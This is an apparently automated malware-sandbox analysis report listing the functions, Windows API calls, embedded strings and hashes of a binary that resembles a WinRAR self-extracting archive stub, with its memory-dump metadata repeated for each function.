LICENSEDLG, xrefs: 00007FF7E1DDC0C9

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
API String ID: 3303814210-2702805183
Opcode ID: f09fb21a4dca633731e21fa30c3b65a2e70867797e80f2e70a23c2b24a2a3025
Instruction ID: dfcf4a5408783af4389680524db8da3e1cac605670b95f0692ddd9ea8f75c170
Opcode Fuzzy Hash: f09fb21a4dca633731e21fa30c3b65a2e70867797e80f2e70a23c2b24a2a3025
Instruction Fuzzy Hash: CFD29462E0868251EB20FB25E8527F9E351FF86784FC04237E98D466A5DFBCE544C722

Function 00007FF7E1DDCE88 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963fileCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF7E1DDD5F3
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDD626
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDD655
MoveFileW.KERNEL32 ref: 00007FF7E1DDDB4B
MoveFileExW.KERNEL32 ref: 00007FF7E1DDDB69
GetTempPathW.KERNEL32 ref: 00007FF7E1DDDC49

Part of subcall function 00007FF7E1DB1FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB1FFB

EndDialog.USER32 ref: 00007FF7E1DDDFCA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DDEEE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEEEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF07
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF0D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF13
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF19
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF1F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF25
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF2B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF31
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF4F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDEF5B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DDEF67
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DDEF73

Strings

.tmp, xrefs: 00007FF7E1DDDA85
lnk, xrefs: 00007FF7E1DDE3CA, 00007FF7E1DDE3D9
MIN, xrefs: 00007FF7E1DDEAE5, 00007FF7E1DDEAF4
HIDE, xrefs: 00007FF7E1DDE9E5, 00007FF7E1DDE9F4
MAX, xrefs: 00007FF7E1DDEA82, 00007FF7E1DDEA91
.lnk, xrefs: 00007FF7E1DDE406, 00007FF7E1DDE415
Software\Microsoft\Windows\CurrentVersion, xrefs: 00007FF7E1DDD501
ProgramFilesDir, xrefs: 00007FF7E1DDD4F0
@set:user, xrefs: 00007FF7E1DDDD96, 00007FF7E1DDDDA5
<br>, xrefs: 00007FF7E1DDD6DA, 00007FF7E1DDD6E9

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
API String ID: 1830998149-3916287355
Opcode ID: fcd01dd56a1b0d9a94054e53721844b88349af29849e6bffae24d093a89b8920
Instruction ID: f975f5a2a6a60c6addcb0c6d6a5b07dd4774a9fd0e4ab2d50a69dd980179c957
Opcode Fuzzy Hash: fcd01dd56a1b0d9a94054e53721844b88349af29849e6bffae24d093a89b8920
Instruction Fuzzy Hash: 6E13B132B04B8299EB10EF64D8423EC67B5EB44398F800637DA5D57AD9DFB8E584C361

Function 00007FF7E1DE0754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E1DCDFD0: GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE018
Part of subcall function 00007FF7E1DCDFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE030
Part of subcall function 00007FF7E1DCDFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE05D

Part of subcall function 00007FF7E1DC62DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7E1DC62F2
Part of subcall function 00007FF7E1DC62DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7E1DC632C

Part of subcall function 00007FF7E1DD946C: OleInitialize.OLE32 ref: 00007FF7E1DD9486
Part of subcall function 00007FF7E1DD946C: SHGetMalloc.SHELL32 ref: 00007FF7E1DD94D4

GetCommandLineW.KERNEL32 ref: 00007FF7E1DE096E
OpenFileMappingW.KERNEL32 ref: 00007FF7E1DE0A07
MapViewOfFile.KERNEL32 ref: 00007FF7E1DE0A30
UnmapViewOfFile.KERNEL32 ref: 00007FF7E1DE0A46
MapViewOfFile.KERNEL32 ref: 00007FF7E1DE0A63
UnmapViewOfFile.KERNEL32 ref: 00007FF7E1DE0ACA
CloseHandle.KERNEL32 ref: 00007FF7E1DE0AD3
SetEnvironmentVariableW.KERNEL32 ref: 00007FF7E1DE0BAD
GetLocalTime.KERNEL32 ref: 00007FF7E1DE0BB8
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E1DE0C13
SetEnvironmentVariableW.KERNEL32 ref: 00007FF7E1DE0C26
GetModuleHandleW.KERNEL32 ref: 00007FF7E1DE0C2E
LoadIconW.USER32 ref: 00007FF7E1DE0C4D
DialogBoxParamW.USER32 ref: 00007FF7E1DE0CB6
Sleep.KERNEL32 ref: 00007FF7E1DE0CE6
DeleteObject.GDI32 ref: 00007FF7E1DE0D0D
DeleteObject.GDI32 ref: 00007FF7E1DE0D1F
CloseHandle.KERNEL32 ref: 00007FF7E1DE0D67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DE0DD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DE0DDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DE0DE3

Part of subcall function 00007FF7E1DDFD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF7E1DDFD43
Part of subcall function 00007FF7E1DDFD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF7E1DDFDBC

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF7E1DE0C02
winrarsfxmappingfile.tmp, xrefs: 00007FF7E1DE09F9
sfxstime, xrefs: 00007FF7E1DE0C1F
STARTDLG, xrefs: 00007FF7E1DE0CA5
sfxname, xrefs: 00007FF7E1DE0B9B

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 1048086575-3710569615
Opcode ID: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
Instruction ID: a43f67c0f35b3556dbf23a28419ace120a01a32d5f02701123d220c6063b7605
Opcode Fuzzy Hash: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
Instruction Fuzzy Hash: 5A126361F0878681EB14EB24E8423BDA361FF85795FC04233E99D46AA5DFBCE150C362

Function 00007FF7E1DCA4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E1DCA504

Part of subcall function 00007FF7E1DD0F68: WideCharToMultiByte.KERNEL32 ref: 00007FF7E1DD0F99

SetDlgItemTextW.USER32 ref: 00007FF7E1DCA573
GetWindowRect.USER32 ref: 00007FF7E1DCA5AD
GetClientRect.USER32 ref: 00007FF7E1DCA5BB
GetWindowLongPtrW.USER32 ref: 00007FF7E1DCA66C
GetWindowRect.USER32 ref: 00007FF7E1DCA6B2
SetDlgItemTextW.USER32 ref: 00007FF7E1DCA6EC
GetSystemMetrics.USER32 ref: 00007FF7E1DCA6F7
GetWindow.USER32 ref: 00007FF7E1DCA708
GetWindowRect.USER32 ref: 00007FF7E1DCA746
GetWindow.USER32 ref: 00007FF7E1DCA808

Strings

CAPTION, xrefs: 00007FF7E1DCA6CF
$%s:, xrefs: 00007FF7E1DCA4EF

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
String ID: $%s:$CAPTION
API String ID: 1936833115-404845831
Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction ID: 43b49b4ab56f4fa633e380e361a4aab2923713e99a88a80733b5b24b6bbe2a94
Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction Fuzzy Hash: 0791FA32B186418AE718EF29E4117A9E7A1FB84784F805536FE8D47B58DF7CE805CB50

Function 00007FF7E1DD8624 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32 ref: 00007FF7E1DD863D
SizeofResource.KERNEL32 ref: 00007FF7E1DD8659
LoadResource.KERNEL32 ref: 00007FF7E1DD8673
LockResource.KERNEL32 ref: 00007FF7E1DD8685
GlobalAlloc.KERNELBASE ref: 00007FF7E1DD86A6
GlobalLock.KERNEL32 ref: 00007FF7E1DD86BB
GdipAlloc.GDIPLUS ref: 00007FF7E1DD86FE
GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF7E1DD8769
GlobalUnlock.KERNEL32 ref: 00007FF7E1DD878C
GlobalFree.KERNEL32 ref: 00007FF7E1DD8795

Strings

PNG, xrefs: 00007FF7E1DD862F

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction ID: e81c8d6bf1329070feab138793c5df481151aaf3471e8770ea320a9c26467769
Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction Fuzzy Hash: 06417225B09B0291EF15EB16D845379E3A0BF88B91F884536DD0D47368EFBCE5A4C322

Function 00007FF7E1DBF930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC1239
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC123F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC1245
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC124B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC1251
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC1257
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC125D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC1263

Strings

__tmp_reference_source_, xrefs: 00007FF7E1DBFCCF, 00007FF7E1DBFCDE

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: __tmp_reference_source_
API String ID: 3668304517-685763994
Opcode ID: ee1b9b2f793652c4fffa685adae4afd38ebba44b70748007b51654422c3c5d5b
Instruction ID: 743f1a66cde0c63f240b3100881c504cd6bf5b529f9b8691d02942fc2c18ae02
Opcode Fuzzy Hash: ee1b9b2f793652c4fffa685adae4afd38ebba44b70748007b51654422c3c5d5b
Instruction Fuzzy Hash: BAE2D466A086C692EB64EB25D0423FEE761FB81780F804533DB9D036A5CFBCE454C762

Function 00007FF7E1DB4840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB511E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB5124
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB512A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB5E16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB5E1C

Strings

CMT, xrefs: 00007FF7E1DB59B2

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: CMT
API String ID: 3668304517-2756464174
Opcode ID: b72a447c2ddb22f05185b9639a81e7227c320d37a75114c120090eb22b33af98
Instruction ID: 2055b661071515e3e76b408df283505bea5e2914f2f46cb74181ede1e5bd8f0d
Opcode Fuzzy Hash: b72a447c2ddb22f05185b9639a81e7227c320d37a75114c120090eb22b33af98
Instruction Fuzzy Hash: 49E20462B08682A6EB18EB65D0527FDE7A1FB45384F800537DA5F43696CFBCE055C322

Function 00007FF7E1DC40BC Relevance: 10.7, APIs: 7, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00007FF7E1DC410B
FindFirstFileW.KERNELBASE ref: 00007FF7E1DC415E
GetLastError.KERNEL32 ref: 00007FF7E1DC41AF
FindNextFileW.KERNEL32 ref: 00007FF7E1DC41D7
GetLastError.KERNEL32 ref: 00007FF7E1DC41E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC430F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC4315

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
String ID:
API String ID: 474548282-0
Opcode ID: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
Instruction ID: a8a343b5244f3ff4d60aa2ac993e161e858a0eeb8a98368b21185a91204746b6
Opcode Fuzzy Hash: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
Instruction Fuzzy Hash: C861C462B0864281EB11EB24E88236DA361FF857B4F904732EAAD436D8DFBCD584C751

Function 00007FF7E1DB5E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMT, xrefs: 00007FF7E1DB59B2, 00007FF7E1DB675B

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
Instruction ID: db46eaabb116fefb1e52670d86a308d0855d05afd9476dabeb7731a30ebdcca3
Opcode Fuzzy Hash: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
Instruction Fuzzy Hash: 8642E222B08A8166EB18EB74C1527FDA7A1EB11744F800137DB2F93696DFB8F558C352

Function 00007FF7E1DD1F20 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
Instruction ID: 07d0540bea2d9aa13d0000a9d0f6dbdda166bdcf92d1e02c99cc38c2ebeeff3a
Opcode Fuzzy Hash: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
Instruction Fuzzy Hash: 67E12622A082828AEB65EF29A0463BDB790FB44748F85523ADB4E47B45DF7CE541C713

Function 00007FF7E1DD3484 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ae873f8167721f5f2066597c1632663bc2c9996c3b34b327fe22a5c50172c8
Instruction ID: 6fe71aef71500536b30f8c9c564018e3b5836fa3145e5cb101de8dd16c4bfdbc
Opcode Fuzzy Hash: 42ae873f8167721f5f2066597c1632663bc2c9996c3b34b327fe22a5c50172c8
Instruction Fuzzy Hash: B7B1DFA2B04AC9A2DF58EA66D609BE9A391F744BC4F888137DE0D07740DFBCE155C312

Function 00007FF7E1DC4928 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID:
API String ID: 3340455307-0
Opcode ID: 9f1cbd0ae3de128b3baec150e1e4cd931595298ca254ea0b004e55239e899349
Instruction ID: 7ea3d7aa50609a2892ba18118836421dc7a62a076cfd178ca1428aafa587617b
Opcode Fuzzy Hash: 9f1cbd0ae3de128b3baec150e1e4cd931595298ca254ea0b004e55239e899349
Instruction Fuzzy Hash: 05417B22B1465286FB69EF15E90237AA352FBC4788F844436DE0D43794CFBCE442C395

Function 00007FF7E1DCDFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE018
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE030
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE05D
CreateFileW.KERNEL32 ref: 00007FF7E1DCE3F0
SetFilePointer.KERNEL32 ref: 00007FF7E1DCE40E
ReadFile.KERNEL32 ref: 00007FF7E1DCE436

